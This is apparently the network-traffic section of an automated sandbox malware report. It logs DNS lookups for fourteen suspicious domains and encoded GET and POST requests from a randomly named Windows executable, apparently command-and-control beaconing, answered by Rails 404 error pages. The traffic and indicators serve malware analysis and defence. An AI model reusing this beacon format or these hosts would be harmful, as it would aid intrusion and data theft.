Nov 2, 2024 05:25:42.343667984 CET	192.168.2.4	1.1.1.1	0x7cb6	Standard query (0)	www.5hdgb2p9a.buzz	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:25:58.930646896 CET	192.168.2.4	1.1.1.1	0x640c	Standard query (0)	www.newhopetoday.app	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:26:12.789783001 CET	192.168.2.4	1.1.1.1	0x632a	Standard query (0)	www.030002107.xyz	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:26:26.461556911 CET	192.168.2.4	1.1.1.1	0x8b2c	Standard query (0)	www.awarnkishesomber.space	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:26:39.914736032 CET	192.168.2.4	1.1.1.1	0x3f58	Standard query (0)	www.marketplacer.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:26:53.868175030 CET	192.168.2.4	1.1.1.1	0x6ae8	Standard query (0)	www.sonoscan.org	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:27:07.493144989 CET	192.168.2.4	1.1.1.1	0x10f3	Standard query (0)	www.75e296qdx.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:27:16.015942097 CET	192.168.2.4	1.1.1.1	0x6d9f	Standard query (0)	www.plazerdigital.store	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:27:29.805521011 CET	192.168.2.4	1.1.1.1	0x5382	Standard query (0)	www.nuvisio.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:27:43.742115021 CET	192.168.2.4	1.1.1.1	0xbc42	Standard query (0)	www.mjmegartravel.online	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:28:02.293662071 CET	192.168.2.4	1.1.1.1	0x1fa6	Standard query (0)	www.thesquare.world	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:28:15.727677107 CET	192.168.2.4	1.1.1.1	0x7ec2	Standard query (0)	www.d21dk.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:28:30.774179935 CET	192.168.2.4	1.1.1.1	0x56eb	Standard query (0)	www.pridegrove.net	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:28:44.729330063 CET	192.168.2.4	1.1.1.1	0x3b70	Standard query (0)	www.budged.net	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:28:58.556262016 CET	192.168.2.4	1.1.1.1	0xc16a	Standard query (0)	www.roopiedutech.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 2, 2024 05:25:42.725790024 CET	1.1.1.1	192.168.2.4	0x7cb6	No error (0)	www.5hdgb2p9a.buzz		168.76.221.252	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:25:59.358803988 CET	1.1.1.1	192.168.2.4	0x640c	No error (0)	www.newhopetoday.app		216.40.34.41	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:26:12.819057941 CET	1.1.1.1	192.168.2.4	0x632a	No error (0)	www.030002107.xyz		161.97.142.144	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:26:26.473638058 CET	1.1.1.1	192.168.2.4	0x8b2c	No error (0)	www.awarnkishesomber.space		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:26:26.473638058 CET	1.1.1.1	192.168.2.4	0x8b2c	No error (0)	www.awarnkishesomber.space		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:26:40.127636909 CET	1.1.1.1	192.168.2.4	0x3f58	No error (0)	www.marketplacer.top		194.58.112.174	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:26:53.885046959 CET	1.1.1.1	192.168.2.4	0x6ae8	No error (0)	www.sonoscan.org		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:26:53.885046959 CET	1.1.1.1	192.168.2.4	0x6ae8	No error (0)	www.sonoscan.org		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:27:07.947171926 CET	1.1.1.1	192.168.2.4	0x10f3	Server failure (2)	www.75e296qdx.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:27:16.431488037 CET	1.1.1.1	192.168.2.4	0x6d9f	No error (0)	www.plazerdigital.store	plazerdigital.store		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 05:27:16.431488037 CET	1.1.1.1	192.168.2.4	0x6d9f	No error (0)	plazerdigital.store		162.240.81.18	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:27:30.278074026 CET	1.1.1.1	192.168.2.4	0x5382	No error (0)	www.nuvisio.top		162.0.211.143	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:27:43.758219957 CET	1.1.1.1	192.168.2.4	0xbc42	No error (0)	www.mjmegartravel.online	mjmegartravel.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 05:27:43.758219957 CET	1.1.1.1	192.168.2.4	0xbc42	No error (0)	mjmegartravel.online		76.223.67.189	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:27:43.758219957 CET	1.1.1.1	192.168.2.4	0xbc42	No error (0)	mjmegartravel.online		13.248.213.45	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:28:02.317718983 CET	1.1.1.1	192.168.2.4	0x1fa6	No error (0)	www.thesquare.world		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:28:02.317718983 CET	1.1.1.1	192.168.2.4	0x1fa6	No error (0)	www.thesquare.world		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:28:16.346237898 CET	1.1.1.1	192.168.2.4	0x7ec2	No error (0)	www.d21dk.top	d21dk.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 05:28:16.346237898 CET	1.1.1.1	192.168.2.4	0x7ec2	No error (0)	d21dk.top		154.23.184.185	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:28:31.181958914 CET	1.1.1.1	192.168.2.4	0x56eb	No error (0)	www.pridegrove.net		172.67.217.184	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:28:31.181958914 CET	1.1.1.1	192.168.2.4	0x56eb	No error (0)	www.pridegrove.net		104.21.45.179	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:28:44.763798952 CET	1.1.1.1	192.168.2.4	0x3b70	No error (0)	www.budged.net	budged.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 05:28:44.763798952 CET	1.1.1.1	192.168.2.4	0x3b70	No error (0)	budged.net		195.154.200.15	A (IP address)	IN (0x0001)	false
Nov 2, 2024 05:28:59.258208036 CET	1.1.1.1	192.168.2.4	0xc16a	No error (0)	www.roopiedutech.online	roopiedutech.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 2, 2024 05:28:59.258208036 CET	1.1.1.1	192.168.2.4	0xc16a	No error (0)	roopiedutech.online		103.191.208.137	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.5hdgb2p9a.buzz

www.newhopetoday.app

www.030002107.xyz

www.awarnkishesomber.space

www.marketplacer.top

www.sonoscan.org

www.plazerdigital.store

www.nuvisio.top

www.mjmegartravel.online

www.thesquare.world

www.d21dk.top

www.pridegrove.net

www.budged.net

www.roopiedutech.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	168.76.221.252	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:25:42.745809078 CET	435	OUT	GET /bedk/?OrsLbfS8=bNXGDlb8ijfNeMgmhZTZ4FzLofpKf3xMzeaEkkxrOS80wCjY80VgIVIW1XOxzrJ8jeMQ/0USGbOA1QV9Qk2cwvhhTVNhrn3OMd04uTPQDgeikoDHYJT4kBk=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1 Host: www.5hdgb2p9a.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49758	216.40.34.41	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:25:59.377573013 CET	698	OUT	POST /qbij/ HTTP/1.1 Host: www.newhopetoday.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.newhopetoday.app Referer: http://www.newhopetoday.app/qbij/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 36 77 70 52 6f 38 75 4d 50 4d 4c 50 74 57 4c 2b 5a 66 31 6c 58 2f 64 51 72 43 34 46 72 4b 41 33 31 5a 2b 39 48 39 52 31 31 37 39 6a 4c 2f 41 4e 61 51 68 45 73 70 46 33 79 63 68 4c 46 64 71 49 46 77 78 46 45 70 56 41 48 33 73 45 53 45 4c 46 61 4d 57 50 4a 59 44 6b 47 58 67 4f 51 57 6f 56 72 37 52 35 4d 79 76 39 71 59 2b 77 2f 70 64 59 50 41 52 33 47 50 45 72 35 2b 65 61 45 59 64 34 57 68 50 58 2b 56 71 62 4f 73 41 52 74 62 71 46 69 51 6e 50 75 4d 77 67 6b 41 75 35 6b 34 2f 72 78 6c 58 31 44 50 4d 54 56 6c 66 55 56 48 43 53 41 44 6c 53 46 6e 2f 61 46 78 73 70 32 73 42 62 2b 77 3d 3d Data Ascii: OrsLbfS8=6wpRo8uMPMLPtWL+Zf1lX/dQrC4FrKA31Z+9H9R1179jL/ANaQhEspF3ychLFdqIFwxFEpVAH3sESELFaMWPJYDkGXgOQWoVr7R5Myv9qY+w/pdYPAR3GPEr5+eaEYd4WhPX+VqbOsARtbqFiQnPuMwgkAu5k4/rxlX1DPMTVlfUVHCSADlSFn/aFxsp2sBb+w==
Nov 2, 2024 05:26:00.070993900 CET	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 40d1fc0a-8bdd-4d94-9685-9f6aa01e1070 x-runtime: 0.023792 content-length: 17104 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Nov 2, 2024 05:26:00.071007967 CET	1236	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
Nov 2, 2024 05:26:00.071017981 CET	424	IN	Data Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
Nov 2, 2024 05:26:00.079111099 CET	1236	IN	Data Raw: 5f 74 61 62 6c 65 20 74 62 6f 64 79 2e 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65 Data Ascii: _table tbody.fuzzy_matches { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none;
Nov 2, 2024 05:26:00.079121113 CET	1236	IN	Data Raw: 63 65 26 23 33 39 3b 29 3b 68 69 64 65 28 26 23 33 39 3b 46 75 6c 6c 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c Data Ascii: ce');hide('Full-Trace');show('Application-Trace');; return false;">Application Trace</a> \| <a href="#" onclick="hide('Application-Trace');hide('Full-Trace');show('Framework-Trace');; return false
Nov 2, 2024 05:26:00.079138041 CET	1236	IN	Data Raw: 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e Data Ascii: _ip.rb:81:in `call'</a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call'</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_di
Nov 2, 2024 05:26:00.079149008 CET	1236	IN	Data Raw: 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 Data Ascii: (4.3.9) lib/puma/configuration.rb:228:in `call'</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request'</a><br><a class="trace-frames" data-frame-id="16" href="#">puma (4.3.9)
Nov 2, 2024 05:26:00.079166889 CET	1236	IN	Data Raw: 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 6d 6f 74 65 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 Data Ascii: k (5.2.6) lib/action_dispatch/middleware/remote_ip.rb:81:in `call'</a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call'</a><br><a class="trace-frames" data-frame-i
Nov 2, 2024 05:26:00.079178095 CET	1236	IN	Data Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 34 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 72 62 3a Data Ascii: "trace-frames" data-frame-id="14" href="#">puma (4.3.9) lib/puma/configuration.rb:228:in `call'</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request'</a><br><a class="trace-f
Nov 2, 2024 05:26:00.079189062 CET	1236	IN	Data Raw: 64 22 3b 0a 20 20 20 20 20 20 20 20 73 65 6c 65 63 74 65 64 46 72 61 6d 65 20 3d 20 74 61 72 67 65 74 3b 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 43 68 61 6e 67 65 20 74 68 65 20 65 78 74 72 61 63 74 65 64 20 73 6f 75 72 63 65 20 63 6f 64 65 0a 20 Data Ascii: d"; selectedFrame = target; // Change the extracted source code changeSourceExtract(frame_id); }); function changeSourceExtract(frame_id) { var el = document.getElementById('frame-source-' + frame_
Nov 2, 2024 05:26:00.079200983 CET	1236	IN	Data Raw: 63 74 5f 6d 61 74 63 68 65 73 27 3e 0a 20 20 3c 2f 74 62 6f 64 79 3e 0a 20 20 3c 74 62 6f 64 79 20 63 6c 61 73 73 3d 27 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 27 20 69 64 3d 27 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 27 3e 0a 20 20 3c 2f 74 62 6f Data Ascii: ct_matches'> </tbody> <tbody class='fuzzy_matches' id='fuzzy_matches'> </tbody> <tbody> <tr class='route_row' data-helper='path'> <td data-route-name='root'> root<span class='helper'>_path</span> </td> <td> GET </

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49773	216.40.34.41	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:01.914421082 CET	718	OUT	POST /qbij/ HTTP/1.1 Host: www.newhopetoday.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 225 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.newhopetoday.app Referer: http://www.newhopetoday.app/qbij/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 36 77 70 52 6f 38 75 4d 50 4d 4c 50 72 30 66 2b 61 34 5a 6c 51 66 64 54 79 69 34 46 6b 71 41 4e 31 65 32 39 48 38 55 6f 30 4e 6c 6a 4c 65 77 4e 5a 55 4e 45 74 70 46 33 38 38 67 42 49 39 71 42 46 77 31 33 45 6f 5a 41 48 33 34 45 53 42 33 46 61 39 57 51 4b 6f 44 6d 4b 33 67 4d 66 32 6f 56 72 37 52 35 4d 79 72 54 71 63 61 77 2f 34 4e 59 4f 6b 4e 77 59 66 45 30 77 65 65 61 53 6f 64 38 57 68 4f 43 2b 55 6e 41 4f 71 4d 52 74 61 61 46 6a 44 2f 4d 6b 4d 77 75 72 67 76 52 6e 4b 75 47 77 6c 71 6b 42 73 68 77 55 30 58 49 51 42 50 49 52 79 45 46 58 6e 62 70 59 32 6c 64 37 76 38 53 6c 2b 65 75 48 38 71 31 63 57 31 38 41 76 55 6c 4c 63 59 47 39 78 30 3d Data Ascii: OrsLbfS8=6wpRo8uMPMLPr0f+a4ZlQfdTyi4FkqAN1e29H8Uo0NljLewNZUNEtpF388gBI9qBFw13EoZAH34ESB3Fa9WQKoDmK3gMf2oVr7R5MyrTqcaw/4NYOkNwYfE0weeaSod8WhOC+UnAOqMRtaaFjD/MkMwurgvRnKuGwlqkBshwU0XIQBPIRyEFXnbpY2ld7v8Sl+euH8q1cW18AvUlLcYG9x0=
Nov 2, 2024 05:26:02.603230953 CET	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 0e1c2833-ab06-491a-992b-bcfecf41aeb4 x-runtime: 0.021988 content-length: 17124 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Nov 2, 2024 05:26:02.603362083 CET	1236	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
Nov 2, 2024 05:26:02.603372097 CET	1236	IN	Data Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
Nov 2, 2024 05:26:02.603384018 CET	1236	IN	Data Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20 Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
Nov 2, 2024 05:26:02.603394985 CET	848	IN	Data Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call'</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app'</a><br><a class="trace-frames" data-frame-id="3" h
Nov 2, 2024 05:26:02.603408098 CET	1236	IN	Data Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 Data Ascii: "trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call'</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call
Nov 2, 2024 05:26:02.603420019 CET	1236	IN	Data Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33 Data Ascii: "trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread'</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-f
Nov 2, 2024 05:26:02.603431940 CET	424	IN	Data Raw: 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 Data Ascii: d_override.rb:24:in `call'</a><br><a class="trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call'</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache
Nov 2, 2024 05:26:02.603442907 CET	1236	IN	Data Raw: 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 Data Ascii: call'</a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call'</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110
